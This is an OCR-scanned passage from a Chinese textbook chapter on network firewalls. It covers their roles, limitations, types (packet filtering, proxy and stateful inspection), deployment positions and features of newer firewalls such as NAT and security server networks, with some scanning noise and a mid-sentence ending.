防火 墙 里 都 有 一 个 重要 的 门 ,允许 人 们 进入 或 离开 房屋 。 因 此 ,防火 墙 在 提供 增强 安全 性 的 
同时 应 允许 必要 的 访问 。 
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计算 机 网 络 安全 领域 中 的 防火 墙 指 位 于 两 个 或 多 个 网 络 之 间 ,执行 访问 控制 策略 的 一 
个 或 一 组 系统 ,是 一 类 防范 措施 的 总 称 。 其 作用 是 防止 不 希望 的 .未 经 授权 的 通信 进出 被 保 
护 的 网 络 ,通过 边界 控制 强化 内 部 网 络 的 安全 。 防 火 墙 通常 放置 在 外 部 网 络 和 内 部 网 络 中 
间 ,执行 网 络 边界 的 过 滤 封 锁 机 制 , 如 图 8-1 所 示 。 


yy 


FTP DNS 


ee 


图 8-1 防火 墙 系统 模型 


2. 防火 墙 的 作用 

在 互联 网 上 防火 墙 是 一 种 非常 有 效 的 网 络 安全 设备 ,通过 它 可 以 隔离 风险 区 域 ( 即 
Internet 或 有 一 定 风险 的 网 络 ) 与 安全 区 域 ( 即 通常 讲 的 内 部 网 络 ) 的 连接 ,同时 不 妨碍 本 地 
网 络 用 户 对 风险 区 域 的 访问 。 防 火 墙 可 以 监控 进出 网 络 的 通信 , 仅 让 安全 ,核准 了 的 信息 进 
入 ,抵制 对 本 地 网 络 安全 构成 威胁 的 数据 。 因 此 ,防火 墙 的 作用 是 防止 不 希望 的 ,未 授权 的 
通信 进出 被 保护 的 网 络 , 迫 使 用 户 强化 自己 的 网 络 安全 政策 ,简化 网 络 的 安全 管理 。 

3. 防火 墙 的 功能 

从 总 体 上 看 ,常见 的 防火 墙 应 具有 以 下 5 大 基本 功能 。 

(1) 过 滤 进 .出 内 部 网 络 的 数据 。 

(2) 管理 进 .出 内 部 网 络 的 访问 行为 。 

(3) 封 堵 某 些 禁止 的 业务 。 

(4) 记录 通过 防火 墙 的 信息 内 容 和 活动 。 

(5) 对 网 络 攻击 进行 检测 和 报警 。 

除 此 以 外 ,有 的 防火 墙 还 根据 需求 包括 其 他 的 功能 ,如 网 络 地 址 转换 (NAT)、 双 重 
DNS .虚拟 专用 网 络 (VPN) 、 扫 毒 、 负 载 均 衡 和 计 费 等 功能 。 为 实现 以 上 功能 ,在 防火 墙 产 
品 的 开发 中 ,广泛 地 应 用 网 络 拓 扑 技 术 、 计 算 机 操作 系统 技术 、 路 由 技术 、 加 密 技术 、 访 问 控 
制 技术 以 及 安全 审计 技术 等 。 还 没有 厂商 绝对 保证 防火 墙 不 会 存在 安全 漏洞 ,因此 对 防火 
墙 也 必须 提供 某 种 安全 保护 。 

4. 防火 墙 的 特性 

防火 墙 一 般 放置 在 被 保护 网 络 的 边界 ,要 使 防火 墙 起 到 安全 防御 作用 ,必须 做 到 : 使 所 
有 进出 被 保护 网 络 的 通信 数据 流 必 须 经 过 防火 墙 , 所 有 通过 防火 墙 的 通信 必须 经 过 安全 策 
略 的 过 滤 或 者 防火 墙 的 授权 ,另外 ,防火 墙 本 身 也 必须 是 不 可 被 侵入 的 。 
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5. 防火 墙 的 优点 

防火 墙 具 有 以 下 优点 。 

(1) 防火 墙 对 企业 内 部 网 实现 了 集中 的 安全 管理 ,可 以 强化 网 络 安全 策略 ,比分 散 的 主 
机 管理 更 经 济 易 行 。 

(2) 防火 墙 能 防止 非 授权 用 户 进 入 内 部 网 络 。 

(3) 防火 墙 可 以 方便 地 监视 网 络 的 安全 性 并 报警 。 

(4) 可 以 作为 部 署 网 络 地 址 转换 的 地 点 ,利用 NAT 技术 ,可 以 缓解 地 址 空间 的 短缺 , 隐 
藏 内 部 网 的 结构 。 

(5) 由 于 所 有 的 访问 都 经 过 防火 墙 ,防火 墙 是 审计 和 记录 网 络 访问 和 使 用 的 最 佳 地 方 。 

6. 防火 墙 的 局 限 性 

通常 ,认为 防火 墙 可 以 保护 处 于 它 身后 的 内 部 网 络 不 受 外 界 的 侵袭 和 干扰 ,但 随 着 网 络 
技术 的 发 展 ,网 络 结构 日 趋 复杂 ,传统 防火 墙 在 使 用 的 过 程 中 暴露 出 以 下 弱点 。 

(1) 防火 墙 不 能 防范 不 经 过 防火 墙 的 攻击 。 没 有 经 过 防火 墙 的 数据 ,防火 墙 无 法 检查 。 
传统 的 防火 墙 在 工作 时 ,入 侵 者 可 以 伪造 数据 绕 过 防火 墙 或 者 找到 防火 墙 中 可 能 敞开 的 
后 门 。 

(2) 防火 墙 不 能 防止 来 自 网 络 内 部 的 攻击 和 安全 问题 。 

(3) 由 于 防火 墙 性 能 上 的 限制 ,因此 它 通常 不 具备 实时 监控 入 侵 的 能 力 。 

(4) 防火 墙 不 能 防止 策略 配置 不 当 或 错误 配置 引起 的 安全 威胁 。 防 火 墙 是 一 个 被 动 的 
安全 策略 执行 设备 ,就 像 门卫 一 样 , 要 根据 政策 规定 来 执行 安全 ,而 不 能 自作 主张 。 

(5) 防火 墙 不 能 防止 受 病毒 感染 的 文件 的 传输 ,由 于 病毒 种 类 繁多 ,如 果 要 在 防火 墙 完 
成 对 所 有 病毒 代码 的 检查 ,防火 墙 的 效率 就 会 低 到 不 能 忍受 的 程度 。 

(6) 防火 墙 不 能 防止 利用 服务 器 系统 和 网 络 协议 漏洞 所 进行 的 攻击 。 黑 客 通过 防火 墙 
准许 的 访问 端口 对 该 服务 器 的 漏洞 进行 攻击 ,防火墙 不 能 防止 。 

(7) 防火 墙 不 能 防止 数据 驱动 式 的 攻击 。 当 有 些 表面 看 来 无 害 的 数据 邮寄 或 复制 到 内 
部 网 的 主机 上 并 被 执行 时 ,可 能 会 发 生 数据 驱动 式 的 攻击 。 

(8) 防火 墙 不 能 防止 内 部 的 泄密 行为 。 如 果 防 火 墙 内 部 的 一 个 合法 用 户主 动 泄密 , 防 
火 墙 是 无 能 为 力 的 。 

(9) 防火 墙 不 能 防止 本 身 的 安全 漏洞 的 威胁 。 防 火 墙 保护 别人 有 时 却 无 法 保护 自己 ， 
防火 墙 本 身 必 须 具 有 很 强 的 抗 攻击 能 力 ,以 确保 其 自身 的 安全 性 。 简 单 的 防火 墙 可 以 只 用 
路 由 器 实现 ,复杂 的 可 以 用 主机 、 专 用 硬件 设备 及 软件 来 实现 。 通 常 意义 上 讲 的 硬 防火 墙 为 
硬件 防火 墙 , 它 是 通过 专用 硬件 和 专用 软件 的 结合 来 达到 隔离 内 、 外 部 网 络 的 目的 ,价格 较 
贵 ,但 效果 较 好 ,一 般 小 型 企业 和 个 人 很 难 实现 。 软 件 防 火 墙 是 通过 软件 的 方式 来 达到 , 价 
格 便宜 ,但 这 类 防火 墙 只 能 通过 一 定 的 规则 来 达到 限制 一 些 非法 用 户 访问 内 部 网 的 目的 。 
防火 墙 被 设计 为 只 运行 专用 的 访问 控制 软件 的 设备 ,而 没有 其 他 的 服务 ,因此 也 就 意味 着 相 
对 少 一些 缺 陷 和 安全 漏洞 。 此 外 ,防火 墙 也 改进 了 登录 和 监控 功能 ,从 而 可 以 进行 专用 的 
管理 。 

总 之 ,防火 墙 是 在 被 保护 网 络 和 外 部 网 络 之 间 进 行 访问 控制 的 一 个 或 者 一 组 访问 控制 
部 件 。 随 着 防火 墙 技 术 的 发 展 ,防火 墙 可 以 结合 人 侵 检测 系统 (IDS) 使 用 ,或 者 其 本 身 集成 
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IDS 功能 ,能 够 根据 实际 情况 进行 动态 的 策略 调整 ,以 达到 更 好 的 防御 效果 。 
8.1.2 防火 墙 的 分 类 


采用 不 同 的 划分 方式 ,可 以 将 防火 墙 划 分 为 不 同 的 类 型 。 如 果 按 采 用 的 技术 划分 可 将 
防火 墙 分 为 包 过 滤 防 火 墙 ,代理 防火 墙 和 状态 检测 防火 墙 。 按 组 成 结构 划分 可 分 成 软件 防 
火 墙 、 硬 件 防 火 墙 和 芯片 级 防火 墙 。 如 果 按 部 署 位 置 划分 防火 墙 又 分 为 边界 防火 墙 个 人 防 
火 墙 和 混合 式 防 火 墙 。 

1. 按 采 用 的 技术 分 类 

防火 墙 主 要 采用 包 过 滤 、 代 理 和 状态 检测 技术 ,所 以 ,根据 防火 墙 采用 技术 的 不 同 ,可 将 
防火 墙 分 为 包 过 滤 防 火 墙 \ 代 理 防火 墙 和 状态 检测 防火 墙 。 每 种 防火 墙 都 有 各 自 的 优 缺 点 。 

1) 包 过 滤 防 火 墙 

@ 工作 原理 : 包 过 滤 是 第 一 代 防 火 墙 技术 。 其 技术 依据 是 网 络 中 的 分 包 传输 技术 , 它 
工作 在 OSI 模型 的 网 络 层 。 网 络 上 的 数据 都 是 以 * 包 ?为 单位 进行 传输 的 ,数据 被 分 割 成 为 
一 定 大 小 的 数据 包 , 每 一 个 数据 包 中 都 会 包含 一 些 特定 信息 ,如 数据 的 IP 源 地址 、IP 目标 
地 址 ,封装 协议 (TCP、UDP、ICMP 等 )、TCP/UDP 源 端口 和 目标 端口 等 。 包 过 滤 防 火 墙 又 
被 称 为 访问 控制 列表 防火 墙 ,其 要 遵循 的 一 条 基本 原则 是 “最 小 特权 原则 ”, 即 明确 允许 管理 
员 指 定 希 望 通过 的 数据 包 , 而 禁止 其 他 的 数据 包 。 

@ 基本 思想 : 选择 路 由 的 同时 对 数据 包 进 行 检查 ,根据 定义 好 的 过 滤 规 则 审查 每 个 数 
据 包 并 确定 数据 包 是 否 与 过 滤 规 则 匹配 ,从 而 决定 数据 包 能 否 通过 。 

@ 包 过 滤 防 火 墙 的 优点 是 可 以 与 现 有 的 路 由 器 集成 ,也 可 以 用 独立 的 包 过 滤 软 件 实 
现 , 且 数 据 包 过 滤 对 用 户 透 明 , 成 本 低 、 速 度 快 .效率 高 。 

@ 包 过 滤 防 火 墙 的 缺点 首先 是 配置 困难 。 因 为 包 过 滤 防 火 墙 很 复杂 ,人 们 经 常会 忽略 
建立 一 些 必 要 的 规则 ,或 者 错误 配置 了 已 有 的 规则 ,若是 为 了 提高 安全 性 而 使 用 复杂 的 过 滤 
规则 , 则 效率 极 低 。 其 次 ,由 于 防火 墙 工 作 在 网 络 层 , 所 以 不 能 检测 那些 对 高 层 进行 的 攻击 。 
还 有 为 特定 服务 开放 的 端口 也 存在 危险 ,可 能 被 用 于 其 他 传输 。 最 后 ,因为 大 多 数 包 过 滤 防 
火 墙 都 是 基于 IP 包头 中 的 信息 进行 过 滤 的 ,但 IP 包 中 信息 的 可 靠 性 没有 保障 ,IP 源 地 址 
可 以 伪造 ,通过 与 内 部 合谋 ,入 侵 者 轻易 就 可 以 绕 过 防火 墙 。 

2) 代理 防火 墙 

代理 防火 墙 是 一 种 较 新 型 的 防火 墙 技术 , 它 分 为 应 用 级 网 关 和 电路 级 网 关 。 

代理 防火 墙 的 原理 是 通过 编程 来 弄 清 用 户 应 用 层 的 流量 ,并 能 在 用 户 层 和 应 用 协议 层 
提供 访问 控制 。 而 且 , 还 可 记录 所 有 应 用 程序 的 访问 情况 ,记录 和 控制 所 有 进出 流量 的 能 力 
是 代理 防火 墙 的 主要 优点 之 一 。 代 理 防火 墙 一 般 是 运行 代理 服务 器 的 主机 。 

代理 服务 器 指 代表 客户 处 理 与 服务 器 连接 请 求 的 程序 。 当 代理 服务 器 接收 到 用 户 对 某 
站 点 的 访问 请 求 后 , 便 会 检查 该 请 求 是 否 符合 规则 ,如果 规则 允许 用 户 访问 该 站 点 ,代理 服 
务 器 会 像 一 个 客户 一 样 去 那个 站 点 取 回 所 需 信 息 再 转发 给 客户 。 代 理 服务 器 通常 都 拥有 一 
个 高 速 缓存 ,这 个 缓存 存储 着 用 户 经 常 访问 的 站 点 内 容 , 在 下 一 个 用 户 要 访问 同一 站 点 时 ， 
服务 器 就 不 用 重复 地 获取 相同 的 内 容 ,直接 将 缓存 内 容 发 出 即 可 , 既 节 约 了 时 间 也 节约 了 网 
络 资源 。 

代理 服务 器 通常 运行 在 两 个 网 络 之 间 , 它 对 于 客户 来 说 像 是 一 台 真 的 服务 器 ,而 对 于 外 
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界 的 服务 器 来 说 , 它 又 是 一 台 客 户 机 ,其 工作 原理 如 图 8-2 所 示 。 从 图 中 可 以 看 出 ,代理 服 
务 器 作为 内 部 网 络 客户 端的 服务 器 ,拦截 所 有 客户 端 要 求 , 也 向 客户 端 转发 响应 ; 代理 客户 
负责 代表 内 部 客户 端 向 外 部 服务 器 发 出 请 求 ,当然 也 向 代理 服务 器 转发 响应 。 代 理 服务 器 
会 像 一 堵 墙 一 样 挡 在 内 部 用 户 和 外 界 之 间 , 从 外 部 只 能 看 到 该 代理 服务 器 而 无 法 获知 任何 
的 内 部 资源 。 


Internet 


真实 的 客户 端 


图 8-2 代理 的 工作 机 制 


(1) 应 用 级 网 关 防 火 墙 

应 用 级 网 关 防 火 墙 是 指 在 网 关上 执行 一 些 特定 的 应 用 程序 和 服务 程序 ,实现 协议 过 滤 
和 转发 功能 , 它 工 作 在 OSI 模型 的 应 用 层 , 且 针对 特定 的 应 用 层 协议 。 其 核心 技术 是 代理 
服务 器 技术 , 它 是 基于 软件 的 ,通常 安装 在 专用 的 服务 器 或 工作 站 系统 上 。 它 适用 于 特定 的 
互联 网 服务 ,如 超 文本 传输 (HTTP) 和 远程 文件 传输 (FTP) 等 。 

应 用 级 网 关 的 优势 在 于 它 授予 网 络 管理 员 对 每 一 个 服务 的 完全 控制 权 , 代 理 服 务 限制 
了 命令 集合 和 内 部 主机 支持 的 服务 。 同 时 ,网 络 管理 员 对 支持 的 服务 可 以 完全 控制 。 另 外 ， 
应 用 级 网 关 安 全 性 较 好 ,支持 强 的 用 户 认 证 、 提 供 详细 的 日 志 信息 以 及 较 包 过 滤 路 由 器 更 易 
于 配置 和 测试 的 过 滤 规 则 。 应 用 级 网 关 防 火 墙 最 大 的 局 限 性 是 它 需要 用 户 或 者 改变 其 性 
能 ,或 者 在 需要 访问 代理 服务 的 系统 上 安装 特殊 的 软件 ,此 外 速度 相对 比较 慢 。 

(2) 电路 级 网 关 防 火 墙 

另 一 种 类 型 的 代理 技术 称 为 电路 级 网 关 。 在 电路 级 网 关中 ,数据 包 被 提交 至 用 户 应 用 
层 处 理 。 电 路 级 网 关 用 来 在 两 个 通信 的 终点 之 间 转 换 包 。 

电路 级 网 关 工作 在 会 话 层 。 在 两 主机 首次 建立 TCP 连接 时 创立 一 个 电子 屏障 。 它 作 
为 服务 器 接收 外 来 请 求 ,并 转发 请 求 ,与 被 保护 的 主机 连接 时 则 担当 客户 机 角色 ,起 代理 服 
务 的 作用 。 它 监视 两 主机 建立 连接 时 的 握手 信息 是 否 合乎 逻辑 ,信号 有 效 后 网 关 仅 复制 、 传 
递 数据 ,而 不 进行 过 滤 。 电 路 级 网 关中 特殊 的 客户 程序 只 在 初次 连接 时 进行 安全 协商 控制 ， 
其 后 就 透明 了 。 只 有 懂得 如 何 与 该 电路 网 关 通 信和 的 客户 机 才能 到 达 防 火 墙 男 一 边 的 服 
务 器 。 

电路 级 网 关 防 火 墙 的 特点 是 将 所 有 跨越 防火 墙 的 网 络 通信 链 路 分 为 两 段 。 防 火 墙 内 外 
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计算 机 系统 间 应 用 层 的 “链接 ”, 由 两 个 终止 代理 服务 器 上 的 “链接 "来 实现 ,外 部 计算 机 的 网 
络 链 路 只 能 到 达 代 理 服务 器 ,从 而 起 到 了 隔离 防火 墙 内 外 计算 机 系统 的 作用 。 此 外 ,代理 服 
务 也 对 过 往 的 数据 包 进行 分 析 、 注 册 登 记 , 形 成 报告 ,同时 当 发 现 被 攻击 迹象 时 会 向 网 络 管 
理 员 发 出 警报 ,并 保留 攻击 痕迹 。 

电路 级 网 关 常 用 于 向 外 连接 ,这 时 网 络 管理 员 对 其 内 部 用 户 是 信任 的 。 电 路 级 网 关 防 
火 墙 可 以 被 设置 成 混合 网 关 , 对 内 连接 支持 应 用 层 或 代理 服务 ,而 对 外 连接 支持 电路 级 功 
能 。 这 样 使 得 防火 墙 系统 对 于 要 访问 Internet 服务 的 内 部 用 户 来 说 使 用 起 来 很 方便 ,由 于 
连接 似乎 是 起 源 于 防火 墙 ,因而 既 可 以 隐藏 受 保护 网 络 的 有 关 信 息 , 又 能 提供 保护 内 部 网 络 
免 于 外 部 攻击 的 防火 墙 功能 。 

代理 技术 的 优点 首先 是 易于 配置 。 因 为 代理 是 一 个 软件 ,所 以 它 较 过 滤 路 由 器 更 易 配 
置 。 其 次 ,代理 能 生成 各 项 记录 。 因 代理 工作 在 应 用 层 , 它 检查 各 项 数据 ,可 生成 各 项 日 志 、 
记录 ,也 可 以 用 于 计 费 等 应 用 。 再 次 ,代理 能 灵活 、 完 全 地 控制 进出 流量 和 内 容 , 能 过 滤 数 据 
内 容 以 及 能 为 用 户 提供 透明 的 加 密 机 制 。 最 后 代理 还 可 以 方便 地 与 其 他 安全 手段 集成 。 

代理 技术 的 缺点 首先 是 其 速度 较 路 由 器 慢 , 且 对 用 户 不 透明 。 其 次 ,对 于 每 项 服务 , 代 
理 可 能 要 求 不 同 的 服务 器 。 还 有 代理 服务 不 能 保证 免 受 所 有 协议 弱点 的 限制 。 再 次 ,代理 
取决 于 在 客户 端 和 真实 服务 器 之 间 插 入 代理 服务 器 的 能 力 ,这 要 求 两 者 之 间 交 流 的 相对 直 
接 性 ,而 且 有 些 服务 的 代理 是 相当 复杂 的 。 最 后 ,代理 不 能 改进 底层 协议 的 安全 性 。 

3) 状态 检测 防火 墙 

状态 检测 防火 墙 的 工作 原理 是 它 的 安全 特性 非常 好 ,其 采用 了 一 个 在 网 关上 执行 网 络 
安全 策略 的 软件 引擎 , 称 为 检测 模块 。 检 测 模 块 在 不 影响 网 络 正常 工作 的 前 提 下 ,采用 抽取 
相关 数据 的 方法 对 网 络 通信 的 各 层 实 施 监 测 ,抽取 部 分 数据 , 即 状态 信息 ,并 动态 地 保存 起 
来 作为 以 后 制订 安全 决策 的 参考 。 

状态 检测 防火 墙 的 优点 是 检测 模块 支持 多 种 协议 和 应 用 程序 ,并 可 以 很 容易 地 实现 应 
用 和 服务 的 扩充 。 其 次 , 它 可 以 检测 RPC 和 UDP 之 类 的 端口 信息 ,而 包 过 滤 和 代理 网 关 都 
不 支持 此 类 端口 。 最 后 ,状态 防火 墙 的 性 能 非常 坚固 。 

状态 检测 防火 墙 的 缺点 是 配置 非常 复杂 ,而 且 会 降低 网 络 的 速度 。 

2. 按 组 成 结构 分 类 

1) 按 组 成 结构 分 为 三 类 

(1) 软件 防火 墙 

网 络 版 的 软件 防火 墙 运行 于 特定 的 计算 机 上 , 它 需 要 客户 预先 安装 好 的 计算 机 操作 系 
统 的 支持 ,一 般 来 说 这 台 计 算 机 就 是 整个 内 部 网 络 的 网 关 。 软 件 防 火 墙 就 像 其 他 的 软件 产 
品 一 样 需要 先 在 计算 机 上 安装 并 做 好 配置 才 可 以 使 用 。 

(2) 硬件 防火 墙 

这 里 所 说 的 硬件 防火 墙 是 针对 芯片 级 防火 墙 来 说 的 。 它 们 最 大 的 差别 在 于 是 否 基于 专 
用 的 硬件 平台 。 目 前 市 场 上 大 多 数 防火 墙 都 是 这 种 所 谓 的 硬件 防火 墙 ,它们 都 基于 PC 架 
构 ,就 是 说 ,它们 和 普通 的 家 庭 用 的 PC 没有 太 大 区 别 。 在 这 些 PC 架构 计算 机 上 运行 一 些 
经 过 裁剪 和 简化 的 操作 系统 ,最 常用 的 有 UNIX、Linux 和 FreeBSD 系统 。 

(3) 芯片 级 防火 墙 

基于 专门 的 硬件 平台 ,核心 部 分 就 是 ASIC 芯片 ,所 有 的 功能 都 集成 在 芯片 上 。 专 有 的 
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ASIC 芯片 促使 它们 比 其 他 种 类 的 防火 墙 速度 更 快 ,处 理 能 力 更 强 , 性 能 更 高 。 

2) 三 种 类 型 的 防火 墙 比 较 

由 于 软件 防火 墙 和 硬件 防火 墙 的 结构 是 运行 于 一 定 的 操作 系统 之 上 ,就 决定 了 它 的 功 
能 是 可 以 随 着 客户 的 实际 需要 而 做 相应 调整 的 ,这 一 点 比较 灵活 。 从 性 能 上 来 说 ,多 添加 一 
个 扩展 功能 就 会 对 防火 墙 处 理 数据 的 性 能 产生 影响 ,添加 的 扩展 功能 越 多 ,防火 墙 的 性 能 就 
下 降 得 越 快 。 

软件 防火 墙 和 硬件 防火 墙 的 安全 性 很 大 程度 上 取决 于 操作 系统 自身 的 安全 性 。 无 论 是 
UNIX、Linux 还 是 Windows 系统 ,都 或 多 或 少 存在 漏洞 ,一 旦 被 人 取得 了 控制 权 , 将 可 以 随 
意 修改 防火 墙 上 的 策略 和 访问 权限 ,进入 内 网 进行 任意 破坏 ,危及 内 网 的 安全 。 芯 片 级 防火 
墙 不 存在 这 个 问题 ,自身 有 很 好 的 安全 保护 ,所 以 较 其 他 类 型 的 防火 墙 安全 性 高 一 些 。 

芯片 级 防火 墙 专 有 的 ASIC 芯片 ,促使 它们 比 其 他 种 类 的 防火 墙 速度 更 快 ,处 理 能 力 更 
强 。 专 用 硬件 和 软件 的 结合 提供 了 线 速 处 理 、 深 层次 信息 包 检 查 .坚固 的 加 密 、 复 杂 内 容 和 
行为 扫描 功能 的 优化 等 ,不 会 在 网 络 流量 的 处 理 上 出 现 瓶 颈 。 目 前 使 用 芯片 级 防火 墙 技术 
成 为 实现 千 兆 力 至 万 兆 防火 墙 的 主要 选择 。 

3. 按 部 署 位 置 分 类 

防火 墙 按 在 网 络 中 部 署 位 置 的 不 同 来 划分 ,可 分 为 边界 防火 墙 \ 个 人 防火 墙 和 混合 式 防 
火 墙 。 

1) 边界 防火 墙 

边界 防火 墙 位 于 内 外 网 络 的 边界 ,所 起 的 作用 是 对 内 、 外 网 络 实施 隔离 ,保护 边界 内 部 
网 络 。 这 类 防火 墙 一 般 都 是 硬件 类 型 的 ,价格 昂贵 ,性 能 较 好 。 

2) 个 人 防火 墙 

个 人 防火 墙 安装 于 单 台 主机 中 ,防御 的 也 只 是 单 台 主机 。 这 类 防火 墙 应 用 于 广大 的 个 
人 用 户 , 即 为 软件 防火 墙 ,价格 最 便宜 ,性 能 也 最 差 。 

3) 混合 式 防火 墙 

混合 式 防火 墙 也 称 * 分 布 式 防 火 墙 ”, 它 是 一 整套 防火 墙 系 统 , 由 若干 软 \ 硬 件 组 成 ,分 布 
于 内 、 外 网 络 边 界 和 内 部 各 主机 之 间 , 既 对 内 、 外 网 络 之 间 数 据 流 进行 过 滤 , 又 对 网 络 内 部 各 
主机 之 间 的 通信 进行 过 滤 。 其 性 能 最 好 ,价格 也 最 贵 。 


8.1.3 新 一 代 防 火 墙 的 主要 技术 

防火 墙 产 品 经 历 了 基于 路 由 器 的 防火 墙 ,用 户 化 的 防火 墙 、 建 立 在 通用 操作 系统 上 的 防 
火 墙 和 具有 安全 操作 系统 的 防火 墙 4 个 阶段 。 随 着 防火 墙 产 品 的 发 展 , 防 火 墙 产品 的 功能 
也 越 来 越 强大 ,逐渐 将 网 关 与 安全 系统 合 二 为 一 ,而 实现 防火 墙 的 技术 和 方式 也 多 种 多 样 ， 
目前 新 一 代 防 火 墙 主 要 有 下 列 技术 及 实现 方式 。 

1. 双 端 口 或 三 端口 的 结构 


新 一 代 防 火 墙 产 品 具有 两 个 或 三 个 独立 的 网 卡 ,内 外 两 个 网 卡 可 不 做 IP 转化 而 串 接 于 
内 部 网 与 外 部 网 之 间 , 另 一 个 网 卡 可 专用 于 对 服务 器 的 安全 保护 。 


2. 透明 的 访问 方式 
以 前 的 防火 墙 在 访问 方式 上 要 么 要 求 用 户 进行 系统 登录 ,要 么 要 求 用 户 安装 防火 墙 的 
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客户 端 软 件 。 新 一 代 防 火 墙 利用 了 透明 的 代理 系统 技术 ,从 而 降低 了 系统 登录 固有 的 安全 
风险 和 出 错 概率 。 

3. 灵活 的 代理 系统 

代理 系统 是 一 种 将 信息 从 防火 墙 的 一 侧 传送 到 另 一 侧 的 软件 模块 。 新 一 代 防 火 墙 采用 
了 两 种 代理 机 制 ,一 种 用 于 代理 从 内 部 网 络 到 外 部 网 络 的 连接 , 另 一 种 用 于 代理 从 外 部 网 络 
到 内 部 网 络 的 连接 。 前 者 采用 网 络 地 址 转换 (Network Address Translation, NAT) 技 术 来 
解决 ,后 者 采用 非 保密 的 用 户 定制 代理 或 保密 的 代理 系统 技术 来 解决 。 

4. 多 级 过 滤 技 术 

为 保证 系统 的 安全 性 和 防御 水 平 , 新 一 代 防 火 墙 采用 了 三 级 过 滤 措 施 , 并 辅 以 鉴别 手 
段 。 在 分 组 过 滤 一 级 ,能 过 滤 掉 所 有 的 源 路 由 分 组 和 假冒 的 IP 源 地 址 ; 在 应 用 网 关 一 级 ， 
能 利用 FTP、SMTP 等 各 种 网 关 , 控 制 和 检测 Internet 提供 的 所 有 通用 服务 ; 在 电路 网 关 一 
级 ,能 实现 内 部 主机 与 外 部 站 点 的 透明 连接 ,并 对 服务 的 通行 实行 严格 控制 。 

5. 网 络 地 址 转换 技术 

网 络 地 址 转换 技术 是 一 种 用 于 把 内 部 IP 地 址 转换 成 外 部 的 IP 地 址 的 技术 。 例 如 使 用 
的 电话 总 机 , 当 不 同 的 内 部 网 络 向 外 连接 时 使 用 相同 的 一 个 或 几 个 IP 地 址 (总 机 号 码 ); 而 
内 部 网 络 互相 通信 时 则 使 用 内 部 IP 地 址 (分 机 号 码 )。 这 样 ,两 个 IP 地 址 就 不 会 发 生 冲 突 。 

新 一 代 防 火 墙 利 用 NAT 技术 能 透明 地 对 所 有 内 部 地 址 做 转换 ,使 外 部 网 络 无 法 了 解 
内 部 网 络 的 结构 ,同时 允许 内 部 网 络 使 用 自己 的 IP 地 址 和 专用 网 络 。 如 表 8-1 所 示 的 地 址 
作为 保留 地 址 , 供 私 网 使 用 。 防 火 墙 能 详尽 记录 每 一 个 主机 的 通信 ,确保 每 个 分 组 送 往 正确 
的 地 址 。 


表 8-1 保留 地 址 
A 类 10. 0. 0. 0 一 10. 255. 255. 255 
B 类 172. 16. 0.0~172. 31. 255. 255 
C 类 192. 168. 0. 0~192. 168. 255. 255 


6. Internet 网 关 技 术 

由 于 是 直接 串 连 在 网 络 之 中 ,新 一 代 防 火 墙 必须 支持 用 户 在 Internet 中 互 连 的 所 有 服 
务 , 同 时 还 要 防止 与 Internet 服务 有 关 的 安全 漏洞 。 故 它 要 能 以 多 种 安全 的 应 用 服务 器 ( 包 
括 FTP、Finger、Mail、Telnet、News 和 WWW 等 ) 来 实现 网 关 功 能 。 

在 域名 服务 方面 ,新 一 代 防 火 墙 采用 两 种 独立 的 域名 服务 器 ,一 种 是 内 部 DNS 服务 器 ， 
主要 处 理 内 部 网 络 的 DNS 信息 ; 另 一 种 是 外 部 DNS 服务 器 ,专门 用 于 处 理 机 构 内 部 向 
Internet 提供 的 部 分 DNS 信息 。 

在 匿名 FTP 方 面 , 服 务 器 只 提供 对 有 限 的 受 保 护 的 部 分 目录 的 只 读 访 问 。 在 WWW 
服务 器 中 ,只 支持 静态 的 网 页 ,而 不 允许 图 形 或 CGI 代码 等 在 防火 墙 内 运行 。 在 Finger 服 
务 器 中 ,对 外 部 访问 ,防火 墙 只 提供 可 由 内 部 用 户 配置 的 基本 的 文本 信息 ,而 不 提供 任何 与 
攻击 有 关 的 系统 信息 。SMTP 与 POP 邮件 服务 器 要 对 所 有 进 、 出 防火 墙 的 邮件 进行 处 理 ， 
并 利用 邮件 映射 与 标 头 剥 除 的 方法 隐 去 内 部 的 邮件 环境 ,Telnet 服务 器 对 用 户 连 接 的 识别 
进行 专门 处 理 , 网 络 新 闻 服 务 则 为 接收 来 自 ISP 的 新 闻 开 设 了 专门 的 磁盘 空间 。 
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7. 安全 服务 器 网 络 


为 适应 越 来 越 多 的 用 户 向 Internet 上 提供 服务 时 对 服务 器 保护 的 需要 ,新 一 代 防 火 墙 
采用 分 别 保护 的 策略 ,保护 对 外 服务 器 。 它 利用 一 张 网 卡 将 对 外 服务 器 作为 一 个 独立 网 络 
处 理 , 对 外 服务 器 既是 内 部 网 的 一 部 分 ,又 与 内 部 网 关 完 全 隔离 。 这 就 是 安全 服务 器 网 络 
(Security Server Network,SSN) 技 术 。 对 SSN 上 的 主机 既 可 单独 管理 ,也 可 设置 成 通过 
FTP、Telnet 等 方式 从 内 部 网 上 管理 。 

SSN 方法 提供 的 安全 性 要 比 传统 的 隔离 区 (Demilitarized Zone,DMZ) 方 法 好 得 多 , 因 
为 SSN 与 外 部 网 之 间 有 防火 墙 保护 ,SSN 与 内 部 网 之 间 也 有 防火 墙 的 保护 ,而 DMZ 只 是 
一 种 在 内 、 外 部 网 络 网 关 之 间 存在 的 防火 墙 方式 。 一旦 SSN 受到 破坏 ,内 部 网 络 仍 会 处 于 
防火 墙 的 保护 之 下 ,而 一 旦 DMZ 受到 破坏 ,内 部 网 络 便 暴 露 于 攻击 之 下 。 

8. 用 户 鉴 别 与 加 密 

为 了 降低 防火 墙 产品 在 Telnet、FTP 等 服务 和 远程 管理 上 的 安全 风险 ,鉴别 功能 必 不 
可 少 ,新 一 代 防 火 墙 采用 一 次 性 使 用 的 口令 字 系 统 来 作为 鉴别 用 户 的 手段 ,并 实现 了 对 邮件 
的 加 密 。 

9. 用 户 定制 服务 

为 满足 特定 用 户 的 特定 需求 ,新 一 代 防 火 墙 在 提供 众多 服务 的 同时 ,还 为 用 户 定制 提供 
支持 ,这 类 选项 有 通用 TCP .出 站 UDP 、FTP 以 及 SMTP 等 类 ,如 果 某 一 用 户 需要 建立 一 个 
数据 库 的 代理 , 便 可 利用 这 些 支 持 ,方便 设置 。 

10. 审计 和 告警 

新 一 代 防 火 墙 产品 的 审计 和 告警 功能 十 分 健全 ,日 志文 件 包括 一 般 信息 .内核 信息 、 核 
心 信息 .接收 邮件 .邮件 路 径 ,发送 邮 件 、. 已 收 消息 ` 已 发 消息 .连接 需求 .已 鉴别 的 访问 .告警 
